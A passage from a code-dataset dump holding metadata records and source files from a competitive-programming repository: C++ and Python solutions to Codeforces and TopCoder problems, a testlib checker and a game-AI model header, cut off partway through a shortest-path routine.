$HOME/206round/main.cpp E.cpp\ncp $HOME/206round/main.cpp D.cpp\ncp $HOME/206round/main.cpp C.cpp\ncp $HOME/206round/main.cpp B.cpp\ncp $HOME/206round/main.cpp A.cpp\n" }, { "alpha_fraction": 0.33933934569358826, "alphanum_fraction": 0.3588588535785675, "avg_line_length": 16.5, "blob_id": "1ae50607f0a821ab9b0c747131a881781fd83146", "content_id": "c7439442e0dbfb1e738f2281af7404a71c5c7bbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 666, "license_type": "no_license", "max_line_length": 27, "num_lines": 38, "path": "/CodeForce/0723/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = input()\ns = input() + '_'\n\ninbrackets = False\nl = 0\nc = 0\n\nlength = len(s)\n\ncur = 0\nfor i in range(length):\n if s[i] == '_':\n if not inbrackets:\n l = max(l, cur)\n else:\n if cur > 0:\n c += 1\n cur = 0\n elif s[i] == '(':\n if not inbrackets:\n l = max(l, cur)\n else:\n if cur > 0:\n c += 1\n inbrackets = True\n cur = 0\n elif s[i] == ')':\n if not inbrackets:\n l = max(l, cur)\n else:\n if cur > 0:\n c += 1\n inbrackets = False\n cur = 0\n else:\n cur += 1\n\nprint(l, c)\n\n" }, { "alpha_fraction": 0.3956931233406067, "alphanum_fraction": 0.4578286111354828, "avg_line_length": 22.463157653808594, "blob_id": "d4e4132fdde6a00eaf33f1d731d7257e37d543c6", "content_id": "21934ac8393868102bd00b2aee59921e8555e6bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4458, "license_type": "no_license", "max_line_length": 843, "num_lines": 190, "path": "/CodeForce/0417/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a);void writeln(int a, int b); void writeln(int a, int b, int c); void writeln(int a, int b, int c, int d); void writeln(vector<int>& a);\nvoid readln(int& a);void readln(int& a, int& b);void readln(int& a, int& b, int& c);void readln(int& a, int& b, int& c, int& d);void readln(vector<int>& a, int n);\n\nstruct graph\n{\n vector<vector<int>> edges;\n int n;\n graph(int n);\n graph(int n, int m);\n graph();\n void createGraph(int n);\n void add_edge(int u, int v);\n void add_or_edge(int u, int v);\n void writelnMatrix();\n void writeln();\n};\n\nint n, m, k;\nvector<vi> a = {{1, 0}, {4, 1}, {6, 1}, {1, 0}, {2, 1}, {2, 5}, {6, 1}, {1, 1}, {1, 0}, {6, 5}, {2, 1}, {1, 3}, {6, 1}, {2, 5}, {2, 8}, {1, 0}, {1, 1}, {4, 9}, {2, 1}, {1, 2}, {2, 12}, {4, 4}, {4, 1}, {1, 5}, {1, 0}, {2, 8}, {6, 9}, {1, 1}, {2, 1}, {2, 21}, {2, 4}, {1, 4}, {1, 2}, {2, 12}, {2, 17}, {1, 0}, {4, 9}, {14, 29}, {2, 8}, {1, 3}, {1, 1}, {4, 33}, {4, 9}, {1, 7}, {2, 9}, {2, 21}, {14, 1}, {1, 2}, {1, 0}, {2, 5}, {2, 17}, {1, 6}, {4, 1}, {2, 8}, {2, 1}, {1, 1}, {1, 3}, {4, 4}, {2, 4}, {1, 5}, {2, 9}, {16, 1}, {4, 32}, {1, 0}, {1, 2}, {2, 5}, {4, 33}, {1, 4}, {2, 17}, {2, 24}, {2, 1}, {1, 9}, {1, 1}, {2, 13}, {2, 20}, {1, 3}, {4, 1}, {4, 32}, {2, 9}, {1, 8}, {1, 0}, {6, 13}, {40, 25}, {1, 2}, {2, 12}, {2, 28}, {6, 8}, {1, 7}, {1, 4}, {2, 8}, {2, 24}, {1, 1}, {4, 17}, {2, 13}, {2, 4}, {1, 6}, {1, 3}, {4, 49}, {2, 9}, {1, 0}};\nvoid writeln(vector<vi>& a)\n{\n fori(a.size())\n writeln(a[i]);\n}\n\nbool check(int i)\n{\n return sqrt(i) - (int) sqrt(i) == 0;\n}\n\nvoid run()\n{\n //readln(n, m);\n //n = 1;\n //a.resize(n);\n int c = 100, count=0;\n int x = 3;\n for(int m = 1; m <= 100; m++)\n for(int n = 1, f=1; n <= 100; n++, f=1)\n for(int y = 1; y <= c && f; y++)\n if (check(a[n-1][0]*a[n-1][0]*a[n-1][1] + y*y*(n-a[n-1][1])))\n f=0,\n count++;\n cout << count << endl;\n\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\ngraph::graph(int n)\n{\n this->n = n;\n edges.resize(n);\n int t;\n fori(n)\n {\n edges[i].resize(n);\n forj(n)\n readln(t),\n edges[i][j] = t == '1';\n }\n}\n\ngraph::graph(int n, int m)\n{\n this->n = n;\n edges.resize(n);\n int u, v;\n fori(m)\n readln(u, v),\n add_edge(u - 1, v - 1);\n}\n\nvoid graph::add_edge(int u, int v)\n{\n edges[u].pb(v);\n}\n\nvoid graph::add_or_edge(int u, int v)\n{\n edges[u].pb(v);\n edges[v].pb(u);\n}\n\ngraph::graph(){};\n\nvoid graph::createGraph(int n)\n{\n edges.resize(n);\n}\n\nvoid graph::writeln()\n{\n fori(n)\n forj(edges[i].size())\n ::writeln(i, edges[i][j]);\n}\n\nvoid graph::writelnMatrix()\n{\n fori(n)\n {\n forj(n)\n printf(\"%d \", edges[i][j]);\n printf(\"\\n\");\n }\n}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n readln(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid writeln(int a)\n{\n printf(\"%d\\n\", a);\n}\n\nvoid writeln(int a, int b)\n{\n printf(\"%d %d\\n\", a, b);\n}\n\nvoid writeln(int a, int b, int c)\n{\n printf(\"%d %d %d\\n\", a, b, c);\n}\n\nvoid writeln(int a, int b, int c, int d)\n{\n printf(\"%d %d %d %d\\n\", a, b, c, d);\n}\n\nvoid readln(int &a)\n{\n scanf(\"%d\", &a);\n}\n\nvoid readln(int &a, int &b)\n{\n scanf(\"%d %d\", &a, &b);\n}\n\nvoid readln(int &a, int &b, int &c)\n{\n scanf(\"%d %d %d\", &a, &b, &c);\n}\n\nvoid readln(int &a, int &b, int &c, int &d)\n{\n scanf(\"%d %d %d %d\", &a, &b, &c, &d);\n}\n" }, { "alpha_fraction": 0.4243876338005066, "alphanum_fraction": 0.43876463174819946, "avg_line_length": 29.29032325744629, "blob_id": "fada5acf1becc4e99a5ac0e5259a30a3415c7cb5", "content_id": "e52eabde9495096994f27b8ee4c270928ef65bea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1878, "license_type": "no_license", "max_line_length": 119, "num_lines": 62, "path": "/TopCoder/TC641/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define snd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\nusing namespace std;\n\n#define method int count(vector <int> x, vector <int> y)\n\n#define classname TrianglesContainOriginEasy\n\nint ori(pii& a, pii& b, pii& c)\n{\n ll s = -(c.fst * b.snd - b.fst * c.snd) - a.fst * c.snd + a.snd * c.fst + a.fst * b.snd - a.snd * b.fst;\n if (s < 0)\n return -1;\n if (s > 0)\n return 1;\n return 0;\n}\n\nclass classname\n{\n public :\n method\n {\n vector<pii> a;\n int ans = 0;\n int n = x.size();\n fori(n)\n a.pb({x[i], y[i]});\n pii zero = {0, 0};\n fori(n)\n FOR(j, i + 1, n)\n FOR(k, j + 1, n)\n {\n int r = ori(a[i], a[j], a[k]);\n if (ori(a[i], a[j], zero) == r && ori(a[k], a[i], zero) == r && ori(a[j], a[k], zero) == r)\n ans++;\n }\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.33462658524513245, "alphanum_fraction": 0.3617846667766571, "avg_line_length": 24.774999618530273, "blob_id": "859be6fbe7a303cedf673470dcd193a68b35a7cf", "content_id": "a6d6f1c37d454b5c52ca2395359ab194525639b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 54, "num_lines": 40, "path": "/CodeForce/1146/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma GCC optimize(\"Ofast\")\n#pragma GCC target(\"avx,avx2,fma\")\n#pragma GCC optimize(\"unroll-loops\")\n\n#include <stdio.h>\n\n#define fori(n) for (int i = 0; i < n; ++i)\n#define BS 8192\n\nint n, q;\nint a[100001];\nint x[100001];\nchar c[100001];\n\nint main()\n{\n scanf(\"%d%d\", &n, &q);\n fori(n)\n scanf(\"%d\", &a[i]);\n fori(q)\n scanf(\" %c%d\", &c[i], &x[i]);\n for (int i = 0; i + BS < n; i += BS)\n for (int t = 0; t < q; ++t)\n if (c[t] == '<')\n for (int j = i; j < i + BS; ++j)\n a[j] = a[j] < x[t] ? -a[j] : a[j];\n else\n for (int j = i; j < i + BS; ++j)\n a[j] = a[j] > x[t] ? -a[j] : a[j];\n for (int t = 0; t < q; ++t)\n if (c[t] == '<')\n for (int j = n / BS * BS; j < n; ++j)\n a[j] = a[j] < x[t] ? -a[j] : a[j];\n else\n for (int j = n / BS * BS; j < n; ++j)\n a[j] = a[j] > x[t] ? -a[j] : a[j];\n fori(n)\n printf(\"%d \", a[i]);\n return 0;\n}\n" }, { "alpha_fraction": 0.4226114749908447, "alphanum_fraction": 0.4337579607963562, "avg_line_length": 31.70833396911621, "blob_id": "70779accddd626bc4f99e75848911ad829eac421", "content_id": "ef8c70775b30424a386c97fdafc935d7ccfbf681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3140, "license_type": "no_license", "max_line_length": 928, "num_lines": 96, "path": "/CodeForce/0320/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector< vector<int> > a;\nvector< pair<int, int> > in;\nvector<int> d;\nvector<bool> used;\nqueue<int> q;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n int n;\n readln(n);\n a.resize(n);\n for (int rr = 0; rr < n; rr++)\n {\n int x, y, z;\n readln(x, y, z);\n if (x == 1)\n {\n in.push_back(make_pair(y, z));\n if (in.size() != 1)\n for (int i = 0; i < in.size() - 1; i++)\n {\n if (in[i].first < in[in.size() - 1].first && in[i].second > in[in.size() - 1].first ||\n in[i].first < in[in.size() - 1].second && in[i].second > in[in.size() - 1].second)\n a[in.size() - 1].push_back(i);\n if (in[in.size() - 1].first < in[i].first && in[in.size() - 1].second > in[i].first ||\n in[in.size() - 1].first < in[i].second && in[in.size() - 1].second > in[i].second)\n a[i].push_back(in.size() - 1);\n }\n } else\n {\n y--;z--;\n q.push(y);\n d.clear();\n used.clear();\n d.resize(n + 1, INF);\n used.resize(n + 1, false);\n d[y] = 0;\n used[y] = true;\n bool f = false;\n int u, v;\n while (!q.empty())\n {\n int u = q.front();\n q.pop();\n for (int i = 0; i < a[u].size(); i++)\n {\n int v = a[u][i];\n if (d[v] > d[u] + 1)\n {\n d[v] = d[u] + 1;\n if (!used[v])\n {\n used[v] = true;\n q.push(v);\n }\n }\n }\n }\n f = d[z] != INF;\n if (z >= in.size())\n f = false;\n printf(\"%s\\n\", f ? \"YES\" : \"NO\");\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6270492076873779, "alphanum_fraction": 0.6270492076873779, "avg_line_length": 21.238094329833984, "blob_id": "6a843fffe995fe21a03cc54c249b3ee05d501101", "content_id": "12a366035d8a0847410eee98f65547bb10ee1b79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 488, "license_type": "no_license", "max_line_length": 107, "num_lines": 21, "path": "/trains/ai/cpp-cgdk/model/OilSlick.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#ifndef _OIL_SLICK_H_\r\n#define _OIL_SLICK_H_\r\n\r\n#include \"CircularUnit.h\"\r\n\r\nnamespace model {\r\n class OilSlick : public CircularUnit {\r\n private:\r\n int remainingLifetime;\r\n public:\r\n OilSlick();\r\n OilSlick(long long id, double mass, double x, double y, double speedX, double speedY, double angle,\r\n double angularSpeed, double radius, int remainingLifetime);\r\n\r\n int getRemainingLifetime() const;\r\n };\r\n}\r\n\r\n#endif\r\n" }, { "alpha_fraction": 0.4642857015132904, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 13, "blob_id": "6662c4852519022b4818aef4548e20f70d2a5048", "content_id": "0c146a877bbf4ce54e61c646418d359fc7a2c661", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/CodeForce/1182/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=input()\nprint(n&1^1)<<n/2\n" }, { "alpha_fraction": 0.5190773010253906, "alphanum_fraction": 0.5339152216911316, "avg_line_length": 29.150375366210938, "blob_id": "a24576179a58ff57a39c9bc3915fd9e2767e2a82", "content_id": "516812c1f1b1f2031b7065503e3002aa1998cb5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8020, "license_type": "no_license", "max_line_length": 165, "num_lines": 266, "path": "/CodeForce/0642/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\n#define PACK_SIZE 10\n\nstruct problem\n{\n int tl, count;\n problem() {}\n problem(int tl, int count) : tl(tl), count(count) {}\n};\nvector<problem> problems;\nvector<vector<int>> ok;\nvector<vector<int>> rj;\nint count = 0;\nint curTime = 0;\nint gid = 0;\n\nstruct submission\n{\n int pid, sid, testPointer, ok, rj, time, extime, gid;\n vector<int> testTime;\n submission() {}\n submission(int sid, int pid, int time) : pid(pid), sid(sid), time(time), testPointer(0), ok(0), rj(0), extime(0)\n {\n testTime.resize(problems[pid].count);\n }\n};\nvector<submission> submissions;\n\nint TEST_COUNT = 40;\nint TIME_DELTA = 12000;\nint RJ_COUNT = 200;\nint WEIGHTED_TESTS = 10;\nstruct cmp\n{\n bool operator() (const int& i, const int& j) const\n {\n submission& a = submissions[i];\n submission& b = submissions[j];\n problem& pa = problems[a.pid];\n problem& pb = problems[b.pid];\n int exa = a.extime == 0 ? pa.tl : a.extime;\n int exb = b.extime == 0 ? pb.tl : b.extime;\n //if (a.pid == b.pid)\n //return a.time < b.time;// || a.testPointer > b.testPointer + TEST_COUNT;\n return false\n //|| (a.testPointer > b.testPointer + TEST_COUNT)\n //|| ((a.testPointer < b.testPointer) && (exa * 1ll * (pa.count - a.testPointer + WEIGHTED_TESTS) < exb * 1ll * (pb.count - b.testPointer)))\n //|| (a.time + TIME_DELTA < b.time)\n //|| ((a.rj / (a.rj + 0.0 + a.ok)) > (b.rj / (b.rj + 0.0 + b.ok)) + (RJ_COUNT + 0.0) / 100)\n //|| (a.rj > b.rj + RJ_COUNT)\n || (a.gid < b.gid)\n || false;\n }\n};\npriority_queue<int, vi, cmp> q;\n\nvoid push_submission(int sid)\n{\n submission& s = submissions[sid];\n s.gid = gid++;\n //if (s.testPointer % PACK_SIZE == 0)\n //{\n s.ok = s.rj = 0;\n FOR(i, s.testPointer, s.testPointer + PACK_SIZE)\n s.ok += ok[s.pid][i],\n s.rj += rj[s.pid][i];// * (PACK_SIZE - i) / 2;\n //} \n //else\n //s.ok -= ok[s.pid][s.testPointer] * (PACK_SIZE - (s.testPointer % PACK_SIZE)) / 2,\n //s.rj -= ok[s.pid][s.testPointer] * (PACK_SIZE - (s.testPointer % PACK_SIZE)) / 2;\n q.push(sid);\n}\n\nint pop_submission()\n{\n int temp = q.top();\n q.pop();\n return temp;\n}\n\nint launcher(int numInvokers)\n{\n int use = 0;\n while (use < numInvokers && q.size()) \n {\n submission& s = submissions[pop_submission()];\n if (s.testPointer < problems[s.pid].count)\n {\n while (use < numInvokers && s.testPointer < problems[s.pid].count)\n s.testTime[s.testPointer] = curTime,\n printf(\"%d %d\\n\", s.sid, s.testPointer++),\n ++use;\n if (s.testPointer < problems[s.pid].count)\n push_submission(s.sid);\n }\n }\n return use;\n}\n\nvoid result(int sid, int tid, bool verdict) {\n submission& s = submissions[sid];\n int pid = s.pid;\n if (verdict)\n ok[pid][tid] += 1,\n s.extime = max(s.extime, curTime - s.testTime[tid]);//((s.extime * (s.testPointer + 1)) + curTime - s.time) / (s.testPointer + 2);\n else\n rj[pid][tid] += 1,\n s.testPointer = INF;\n\n if (s.testPointer >= problems[pid].count)\n s.testPointer = INF;\n}\n\nvoid run()\n{\n ints(numInvokers, numProblems);\n problems.resize(numProblems);\n ok.resize(numProblems);\n rj.resize(numProblems);\n int x, y;\n fori(numProblems) \n scanf(\"%d%d\", &x, &y),\n problems[i] = problem(x, y),\n ok[i].resize(y + PACK_SIZE, 0),\n rj[i].resize(y + PACK_SIZE, 0);\n int delta = 10;\n int pid, sid, tid;\n char verdict[100];\n int fir = 1, sec = 2;\n while (fir == 1 && sec == 2)\n {\n while (fir == 1)\n {\n fir = scanf(\"%d\", &pid);\n if (pid == -1)\n break;\n sid = submissions.size();\n submissions.push_back(submission(sid, pid, curTime));\n push_submission(sid);\n }\n while (sec == 2)\n {\n sec = scanf(\"%d %d\", &sid, &tid);\n if (sid == -1 && tid == -1)\n break;\n scanf(\"%s\", verdict);\n numInvokers++;\n result(sid, tid, string(verdict) == \"OK\");\n }\n if (numInvokers > 0)\n {\n int use = launcher(numInvokers);\n if (use > numInvokers)\n exit(2);\n numInvokers -= use;\n }\n\n curTime += delta;\n printf(\"-1 -1\\n\");\n fflush(stdout);\n }\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n //ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 20.600000381469727, "blob_id": "7c869a37da7b1a878d388758d44ed043a0b9f13d", "content_id": "01d7d69a7e7b3e052e1739d591928f004e74063b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 216, "license_type": "no_license", "max_line_length": 100, "num_lines": 10, "path": "/2020/back/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\n\nurl = input()\nport = input()\na = input()\nb = input()\n\nres = list(reversed(sorted(requests.get(''.join([url, ':', port, '?', 'a=', a, '&b=', b])).json())))\nfor i in range(len(res)):\n print(res[i])\n" }, { "alpha_fraction": 0.599056601524353, "alphanum_fraction": 0.6064689755439758, "avg_line_length": 41.400001525878906, "blob_id": "cf85c7cc67a056edd067de13a3e580e0f62697ad", "content_id": "16ac7744decccfbc2ba03a34c91bc86d0b8f7287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1484, "license_type": "no_license", "max_line_length": 117, "num_lines": 35, "path": "/scripts/A+B/checkerA+B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <testlib.h>\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nstring numberFormat = \"-?[1-9][0-9]*|0\";\n\ntuple<string, string, string, string, string> readAns(InStream& stream)\n{\n string first = stream.readString(numberFormat);\n string second = stream.readString(numberFormat);\n string third = stream.readString(numberFormat);\n string forth = stream.readWord(numberFormat);\n stream.readSpace();\n string fifth = stream.readWord(numberFormat);\n return {first, second, third, forth, fifth};\n}\n\nint main(int argc, char* argv[]) {\n registerTestlibCmd(argc, argv);\n auto [ja, js, jm, jdiv, jmod] = readAns(ans);\n auto [pa, ps, pm, pdiv, pmod] = readAns(ouf);\n if (ja != pa)\n quitf(_wa, \"Test %s: summ is incorrect: expected = %s, found = %s\\n\", argv[1], ja.c_str(), pa.c_str());\n else if (js != ps)\n quitf(_wa, \"Test %s: difference is incorrect: expected = %s, found = %s\\n\", argv[1], js.c_str(), ps.c_str());\n else if (jm != pm)\n quitf(_wa, \"Test %s: product is incorrect: expected = %s, found = %s\\n\", argv[1], jm.c_str(), pm.c_str());\n else if (jdiv != pdiv)\n quitf(_wa, \"Test %s: div is incorrect: expected = %s, found = %s\\n\", argv[1], jdiv.c_str(), pdiv.c_str());\n else if (jmod != pmod)\n quitf(_wa, \"Test %s: mod is incorrect: expected = %s, found = %s\\n\", argv[1], jmod.c_str(), pmod.c_str());\n else\n quitf(_ok, \"Test %s: summ, difference, product and divmod are correct!\", argv[1]);\n}\n" }, { "alpha_fraction": 0.44262295961380005, "alphanum_fraction": 0.4773384630680084, "avg_line_length": 25.58974266052246, "blob_id": "bad9207f8c88084643afb9d0834f3c99ea9ea63c", "content_id": "6e21e9b0d55fa35211385d765615989812ed3d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 113, "num_lines": 39, "path": "/CodeForce/0656/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nint N;\n\nint readln(vector<int>& a, int i = 0) { return i == N ? 1 : (scanf(\"%d\", &a[i]) + readln(a, i + 1)); }\nint readln(vector<vector<int>>& g, int i = 0) { return i == N ? 1 : readln(g[i]) + readln(g, i + 1); }\n\nint rec(vector<vector<int>>& g, int i = 0, int j = 0, int k = 0)\n{\n g[j][k] = min(g[j][k], g[j][i] + g[i][k]);\n bool x = (k == N - 1);\n k = (k + 1) % N;\n bool y = x && (j == N - 1);\n x ? j = (j + 1) % N : j = j;\n bool z = y && (i == N - 1);\n y ? i = (i + 1) % N : i = i;\n return z ? 0 : rec(g, i, j, k);\n}\n\nint mx(vector<vector<int>> a, int& m, int i = 0)\n{\n m = max(m, *max_element(a[i].begin(), a[i].end()));\n return i == N - 1 ? 1 : mx(a, m, i + 1);\n}\n\nint main()\n{\n cin >> N;\n vector<vector<int>> g(N, vector<int>(N));\n readln(g);\n rec(g);\n int ans = 0;\n mx(g, ans);\n cout << ans << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.37312471866607666, "alphanum_fraction": 0.3941277265548706, "avg_line_length": 21.760974884033203, "blob_id": "12273f9f3c050ae34304fe8b38869a518a41cc86", "content_id": "228e5f7bd643e2b1f0b78ad707d680e4688cfb5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4666, "license_type": "no_license", "max_line_length": 82, "num_lines": 205, "path": "/trash/lab_da_smthng/minimax/CC.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define ll int\n#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#define qw printf(\"ololo\\n\");\n\nusing namespace std;\n\nconst int INF = 1000000001;\nint n, size;\nvector< vector< bool > > b;\nvector< vector< int > > answer;\nvector<int> dr, dc, p, minpos, minv;\nvector<bool> vis;\n\nstruct edge\n{\n int y;\n ll p, c, f, opp;\n edge(int e, ll r, ll t, ll u, int a)\n {\n y = e;\n c = r;\n f = t;\n p = u;\n opp = a;\n }\n edge(){};\n};\n\nvector<int> place, pp;\nvector<ll> fi, d;\nvector< vector< edge > > edges;\npriority_queue< pair<ll, int> > q;\nvector<bool> in;\nint s = 0;\nint f, u, v, m;\nll w, curd, mn, dfi;\n\nint dijkstra()\n{\n 